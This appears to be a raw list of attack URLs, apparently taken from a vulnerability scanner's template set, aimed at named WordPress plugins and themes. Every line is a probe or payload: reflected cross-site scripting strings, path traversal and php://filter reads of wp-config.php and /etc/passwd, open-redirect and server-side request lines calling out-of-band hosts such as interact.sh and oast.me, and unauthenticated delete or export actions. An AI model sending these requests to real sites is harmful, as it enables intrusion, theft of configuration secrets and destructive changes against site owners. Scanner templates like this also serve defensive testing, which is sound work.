/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&
/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e
/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E
/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/blog/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress
/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22
/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/s3-video/views/video-management/preview_video.php?media=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3C%22
/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}
/wp-content/plugins/userpro/lib/instagram/vendor/cosenary/instagram/example/success.php?error=&error_description=%3Csvg/onload=alert(1)%3E
/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=
/does_not_exist
/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E
/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?Display_FAQ=%3C/script%3E%3Csvg/onload=alert(document.cookie)%3E
/wp-content/plugins/jh-404-logger/readme.txt
/wp-content/plugins/phastpress/phast.php?service=scripts&src=https%3A%2F%2Finteract.sh
/wp-login.php?login-error=<script>alert(document.domain)</script>
/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28123%29%3B%3E&start_date=xxxxxxxxxxxx&avaibility=13
/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F
/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg==
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin.php?page=popup-wp-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?page=acymailing_front&ctrl=frontusers&noheader=1&user[email]=example@mail.com&ctrl=frontusers&task=subscribe&option=acymailing&redirect=https://interact.sh&ajax=0&acy_source=widget%202&hiddenlists=1&acyformname=formAcym93841&acysubmode=widget_acym
/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1
/giveaway/mygiveaways/?share=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?post_type=post&s=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3C/script%3E
/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin-ajax.php?action=tie_get_user_weather&options=%7B%27location%27%3A%27Cairo%27%2C%27units%27%3A%27C%27%2C%27forecast_days%27%3A%275%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ecustom_name%27%3A%27Cairo%27%2C%27animated%27%3A%27true%27%7D
/listings/?search_title=&location=&foodbakery_locations_position=filter&search_type=autocomplete&foodbakery_radius=10%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/community/?foro=signin&redirect_to=https://interact.sh/
/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=%27/onerror=%27alert(document.domain)%27/b=%27
/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20onerror=alert(document.domain)%20b=%27
/titan-framework/lib/iframe-font-preview.php?font-type=google&font-family=aaaaa&font-weight=%27%20accesskey=%27x%27%20onclick=%27alert(document.domain)%27%20class=%27
/wp-content/plugins/marmoset-viewer/mviewer.php?id=http://</script><svg/onload=alert(%27{{randstr}}%27)>
/wp-content/plugins/marmoset-viewer/mviewer.php?id=1+http://a.com%27);alert(/{{randstr}}/);marmoset.embed(%27a
/wp-json/wp/v2/posts
/{{slug}}/?a&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh
/wp-json/anycomment/v1/auth/wordpress?redirect=https://interact.sh?a=https://interact.sh
/wp-content/plugins/elementor/assets/js/frontend.min.js
/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9
/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>
/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>
/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=
/wp-admin/admin.php?page=wp_ajax_rsvp-form&tribe_tickets_redirect_to=https://interact.sh
/?noptin_ns=email_click&to=https://interact.sh
/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh
/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>
/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh
/wp-json/wp/v2/posts?per_page=1
/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>
/?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v
/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh
/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1
/?mapp_iframe=1&mapid=--%3E%3Cimg%20src%20onerror=alert(document.domain)%3E
/wp-admin/admin-ajax.php?action=window&callback=</script><img/src/onerror=alert(document.domain)>
/wp-admin/admin-ajax.php?action=lp_background_single_email&lp-dismiss-notice=xxx<img%20src=x%20onerror=alert(document.domain)>
/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp
/?p=1&xsg-provider=data://text/html,<?php%20echo%20md5(
/wp-admin/admin-ajax.php?action=shareaholic_debug_info
/wp-admin/admin.php?page=rsvp-admin-export
/plugins/jobsearch/?search_title=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert%28domain%29%3E&ajax_filter=true&posted=all&sort-by=recent
/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E
/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1&class=%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/gwyns-imagemap-selector/popup.php?id=1%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-json/wp/v2/asked-question
/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-admin/admin-ajax.php?action=ptp_design4_color_columns&post_id=1&column_names=<script>alert(document.domain)</script>
/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-admin/admin-ajax.php?action=woot_get_smth&what={%22call_action%22:%22x%22,%22more_data%22:%22\u003cscript%3Ealert(document.domain)\u003c/script%3E%22}
/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>
/wp-json/wp/v2/sensei-messages/{{num}}
/wp-admin/options-general.php?page=cf7sr_edit&
/wp-json/ssa/v1/users
/wp-admin/admin-ajax.php?action=directorist_author_pagination
/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E
/wp-admin/admin-ajax.php?action=searchwp_live_search&swpquery=a&post_status=draft
/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/uploads/ao_ccss/queuelog.html
/blog/wp-content/uploads/ao_ccss/queuelog.html
/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=</option><script>alert(document.domain)</script>
/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_calendar&id=XX
/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_dismisshint&callback=<script>alert(document.cookie)</script>
/wp-admin/admin-ajax.php?action=cdaily&subaction=cd_displayday&callback=1&bymethod=&by_id=/../../../../../../r%26_=--><script>alert(document.cookie)</script>
/wp-content/plugins/pdf-generator-for-wp/package/lib/dompdf/vendor/dompdf/dompdf/I18N/Arabic/Examples/Query.php?keyword=
/?SPAI_VJS=%3C/script%3E%3Cimg%20src%3D1%20onerror%3Dalert(document.domain)%3E
/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E
/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me
/wp-admin/admin-ajax.php?action=qem_ajax_calendar&category=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1
/?s={{str}}%3CIMG%20%22%22%22%3E%3CIMG%20SRC=/%20onerror=%22alert(document.domain)%22%3E%3C/img%3E/{{random}}/
/wp-admin/admin-post.php
/aa404bb?a</script><script>alert(/XSS/)</script>
/wp-content/plugins/avchat-3/index_popup.php?movie_param=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&FB_appId=FB_appId%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&
/wp-content/plugins/athlon-manage-calameo-publications/thickbox_content.php?attachment_id=id%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%26
/wp-content/plugins/members-list/admin/view/user.php?page=%22%3E%3Cimg%20src%20onerror=alert(document.domain)%20x
/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo
/properties-with-map/?status&keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(document.domain);//%22
/?aiowpsec_do_log_out=1&after_logout=https://interact.sh
{{paths}}
/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php
/wp-content/plugins/stageshow/stageshow_redirect.php?url=http%3A%2F%2Finteract.sh
/wp-admin/edit.php?post_type=popupbuilder&page=sgpbSubscribers&sgpb-subscribers-date=%22%3E%3Cscript%3Ealert%28origin%29%3C%2Fscript%3E
/wp-admin/admin-ajax.php
/wp-admin/edit.php?post_type=acf-field-group&page=acf-settings-updates&%22%3e%3cscript%3ealert(
/wp-content/themes/bello/readme.txt
/quiz/test-quiz/?result_id=%3C%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/wp-admin/admin.php?page=rrrlgvwr-monitor.php&saved_logs_action=delete&rrrlgvwr_check_del=../readme.txt
/path-to-student-registration?user_login=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
/ticket-creation/?};alert(/XSS/)//=1
/wp-admin/admin-ajax.php?action=mec_list_load_more&current_month_divider=%3Cimg%20src%20onerror=alert(`XSS`);%3E&mec_start_date=1000-01-01
/?keyword=%22%2Bonmouseover%3Dalert%28%2FXSS%2F%29%2Bt%3D%22
/?keyword=%22%2Bstyle%3Danimation-name%3Atwentytwentyone-close-button-transition%2Bonanimationend%3Dalert%28%2FXSS%2F%29%2F%2F
/wp-admin/admin.php?page=tutor_announcements&search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%281%29+x%3D
/wp-admin/options-general.php?page=updraftplus&backup_timestamp=%3Cscript%3Ealert%28/XSS/%29%3B%3C%2Fscript%3E&action=updraft_restore
/wp-admin/admin.php?page=wpbc&booking_type=%22%3E%3Cimg+src+onerror%3Dalert%28/XSS/%29%3E%3Cscript%3E%2F%2A
/wp-json/contact-form-7/v1/contact-forms/1376/feedback
/wp-admin/edit.php?post_type=easy-pricing-table&page=ept3-list&action=trash&post=1
/wp-admin/edit.php?s=%22+style=animation-name:rotation+onanimationstart=alert(/XSS/)//&post_status=all&post_type=give_forms&action=-1&start-date&end-date&give-forms-goal-filter=any_goal_status&paged=1&action2=-1
/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=import&importer-type=import_core_setting
/wp-content/plugins/login-with-phone-number/delete.php?delete=1
/wp-admin/admin.php?page=ap-pricing-tables-lite-add-new&postid=1%27%3E%3Csvg/onload=alert(/XSS)/%3E
/wp-content/uploads/jobmonster/
/wp-content/uploads/jobmonster
/wp-admin/admin.php?page=html2wp-settings
/wp-content/plugins/site-offline/readme.txt
/?admin
/wp-admin/index.php?page=under-construction&turnOffUnderConstructionMode
/wp-admin/edit.php?post_type=give_forms&page=give-tools&tab=export
/?cpmvc_do_action=mvparse&f=datafeed&calid=1&month_index=0&method=adddetails
/wp-admin/admin.php
/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwczovL2Rvd25sb2FkbW9yZXJhbS5jb20vIn0K
/path-to-vulnerable-endpoint
/wp-admin/admin.php?page=drag-n-drop-upload&tab=pro-features%22%3E%3Cscript%3Ealert%28%2Fxss%2F%29%3C%2Fscript%3E
/wp-admin/admin.php?page=gallery-photo-gallery-settings&ays_gpg_tab=%22%20accesskey=X%20onclick=alert(/XSS/)//
/wp-admin/admin.php?page=gallery-photo-gallery&action=edit&gallery=1&ays_gpg_settings_tab=%22%20accesskey=X%20onclick=alert(/XSS/)//
/?p=145&preview=true&blah=%3Cimg%20src=x%20%3Cscript%3Eonerror=alert(window.domain);//%3E
/?rest_route=/ult/v2/review-banner-visibility&action=maybe-later&redirect=yes&redirect_url=https://interact.sh
/?gf_page=randomstring
/wp-admin/admin.php?page=contest_gallery
/{{route}}search=@
/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt
/wp-content/plugins/wordpress-toolbar/toolbar.php?wptbto=https://oast.me&wptbhash=acme
/wp-json/wpgmza/v1/markers?_method=get&random=/wpgmza/v1/markers/{{marker_id}}
/wp-admin/admin-ajax.php?action=eventon_get_virtual_users
/wp-admin/admin-ajax.php?action=eventon_config_virtual_event
/wp-admin/admin-ajax.php?action=eventon_eventpost_update_meta
/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x
/?travelpayouts_redirect=https://oast.me
/wp-content/plugins/user-meta/readme.txt
/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free
/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free
/wp-json/wp/v2/sfwd-assignment
/wp-json/ldlms/v1/sfwd-quiz
/wp-content/uploads/fusion-forms/
/wp-content/plugins/user-meta/views/debug.php
/%0a/google.com
/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/
/wp-admin/admin-ajax.php?action=fetch_posts&stream-id=1&hash=%3Cimg%20src=x%20onerror=alert(document.domain)%3E
/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=
/register/?redirect_to=https://interact.sh/
/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1
/wp-content/themes/ambience/thumb.php?src=%3Cbody%20onload%3Dalert(1)%3E.jpg
/wp-content/themes/Grimag/go.php?https://interact.sh
/wp-admin/admin.php?page=rm_login_advanced&rm_search_value=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
/wp-admin/admin.php?page=rm_login_advanced&rm_search_value=%22%20style=animation-name:rotation%20onanimationstart=alert(/XSS/)//
/wp-admin/admin.php?page=simple_wp_membership&action=bulk_delete&members[0]=1&members[1]=2
/wp-admin/admin-ajax.php?image_url=%22onerror=alert(1)%20t=%22
/wp-admin/admin.php?page=rps_result_batch&edit=%3Cscript%3Ealert(/XSS/)%3C/script%3E
/wp-content/backups-dup-lite/dup-installer/main.installer.php?view=1
/wp-content/backups-dup-lite/dup-installer/main.installer.php?debug=1
/wp-admin/admin-ajax.php?action=bwg_frontend_data&bwg_album_breadcrumb_0=[{%22id%22:%221%27%3E%3Cimg/src=x%20onerror=alert(1)%3E%22,%22page%22:1},{%22id%22:%221%22,%22page%22:1}]&shortcode_id=1%22%20onmouseover=alert(id)//
/wp-admin/admin-ajax.php?action=bwg_frontend_data&gallery_type=image_browser&gallery_id=1&tag=0&album_id=0&theme_id=1&shortcode_id=1%22%20onmouseover=alert(id)//
/?tabbed-login-name=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
/?page_id={{page_with_shortcode}}&form_id=%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E
/?page_id={{page_with_shortcode}}&form_id=1&title=%3Cscript%3Ealert%282%29%3C%2Fscript%3E
/wp-admin/options-general.php?page=updraftplus&job_id&updraft_restore%5B0%5D=%3Cscript%3Ealert%28/XSS/%29%3C%2Fscript%3E&action=updraft_restore&backup_timestamp=123&updraftplus_ajax_restore=start_ajax_restore
/?s=%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
/wp-admin/edit.php?post_type=download&page=edd-payment-history&payment%5B0%5D=1&payment%5B1%5D=2&action=delete
/wp-admin/admin.php?page=simple_wp_membership_payments&action=delete_txn&id=1
/wp-admin/admin-ajax.php?action=eventon&eid=
/wp-admin/admin-ajax.php?action=fts_encrypt_token_ajax&access_token=%3Cimg%20src=x%20onerror=alert(/XSS/)%3E
/wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php&action=new
/wp-admin/admin.php?page=watu_exams&title=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28%2FXSS%2F%29%2F%2F
/wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/uploads/photo-gallery/xss.svg
/wp-admin/admin.php?page=Accessibility&%22%3E%3Cscript%3Ealert(/XSS/)%3C/script%3E
/wp-admin/admin.php?page=tiempocom/app/admin.php&action=delete&shortcode=1
/dompdf.php?input_file=php://filter/resource=/etc/passwd
/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd
/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd
/dompdf.php
/wp-content/plugins/
/wp-login.php?action=lostpassword&error=invalidkey
/wp-content/plugins/protect-wp-admin/readme.txt
/wp-json/wp/v2/users
/wp-json/wp/v2/users?foo=simple-jwt-login
/wp-content/plugins/all-in-one-wp-migration/readme.txt
/wp-content/plugins/all-in-one-wp-migration/storage/error.log
/?aiowpsec_do_log_out=1&al_additional_data=1
/?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;%20onmouseover=alert(1)%20x
/wp-json/tribe/events/v1/organizers
/wp-json/tribe/events/v1/venues
